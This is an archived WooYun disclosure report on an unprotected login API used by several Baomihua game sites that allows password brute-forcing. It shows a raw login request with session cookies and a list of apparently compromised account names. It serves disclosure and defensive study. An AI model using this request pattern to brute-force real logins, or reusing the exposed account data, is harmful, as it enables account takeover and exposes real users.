乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-17: 厂商已经确认,细节仅向厂商公开 2015-12-27: 细节向核心白帽子及相关领域专家公开 2016-01-06: 细节向普通白帽子公开 2016-01-16: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
RT
爆米花天行剑
http://txj.baomihua.com/
爆米花武林传:
http://wlz.baomihua.com/
英雄乱:
http://yxl.baomihua.com/
玄仙传奇:
http://xxcq.baomihua.com
武尊游戏官方网站:
http://wz.baomihua.com/
http://qy.baomihua.com/
http://kt.baomihua.com/
以爆米花天行剑为例:
GET /userapi.asmx/UserLogin?jsoncallback=jQuery18304828840980174135_1449839526143&userName=111111&password=123456&WGTAGS=0.007041393915503735&_=1449839622552 HTTP/1.1Host: login.interface.baomihua.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://txj.baomihua.com/Cookie: Hm_lvt_243292647fac21a08f8c0ee91eda272f=1449834485; McSession=1d197dad-6b85-4783-adba-b8eafb3e71ec; Hm_lvt_825b38f3ef99989d15fa4c4c0c7788fb=1449834685; Hm_lvt_f4fc0041b954fdff94d3b8f2d651e71b=1449834707; AddUserExp=1267223920151211; UserID_47108490UserType_00004_Date_20151211=1; UserID_9358764UserType_00004_Date_20151211=1; UserID_9255509UserType_00004_Date_20151211=1; UserID_9758223UserType_00004_Date_20151211=1; UserID_9945227UserType_00004_Date_20151211=1; Hm_lpvt_243292647fac21a08f8c0ee91eda272f=1449839526; Hm_lpvt_825b38f3ef99989d15fa4c4c0c7788fb=1449834685; Hm_lpvt_f4fc0041b954fdff94d3b8f2d651e71b=1449839526; ASP.NET_SessionId=mutyi4yr5aqa0oamrpuuin31; UserID_9273138UserType_00004_Date_20151211=1; UserID_9335290UserType_00004_Date_20151211=1; UserID_9744880UserType_00004_Date_20151211=1; UserID_9419261UserType_00004_Date_20151211=1; UserID_9403033UserType_00004_Date_20151211=1; UserID_14132877UserType_00004_Date_20151211=1; userCenterLogined=1; UserID_13286792UserType_00004_Date_20151211=1; UserID_9332991UserType_00004_Date_20151211=1; UserID_9255113UserType_00004_Date_20151211=1; UserID_9772495UserType_00004_Date_20151211=1; UserID_14424128UserType_00004_Date_20151211=1; UserID_9349133UserType_00004_Date_20151211=1; UserID_9275236UserType_00004_Date_20151211=1; UserID_9254548UserType_00004_Date_20151211=1; UserID_9983698UserType_00004_Date_20151211=1; UserInfo=; LoginInfo=; PomohoNewNotice=; LoginCookie=; appSinaUserID=; sinaoauth_token=; renrenUserInfo=; renrenAppUserID=; sinaoauth_token_secret=; appUserIDCookie=; verifierCookie=; requesttokenkey=; requesttokensecret=; UserID_12672239UserType_00004_Date_20151211=1Connection: keep-alive
账号:
127 job 200 false false 2622 744 zhangxi 200 false false 2153 1126 xujing 200 false false 2127 558 lichunmei 200 false false 2071 809 litao 200 false false 2045 299 xiajie 200 false false 2039 147 zhangyingying 200 false false 2035 1009 zhangjianjun 200 false false 2033 875 yangjun 200 false false 2021 863 zhangxin 200 false false 2017 707 chenjiahui 200 false false 2013 722 huanghaiyan 200 false false 2009
哟,还是个妹子妹子喜欢看这些
验证机制
危害等级:高
漏洞Rank:11
确认时间:2015-12-17 15:40
已安排修复中
暂无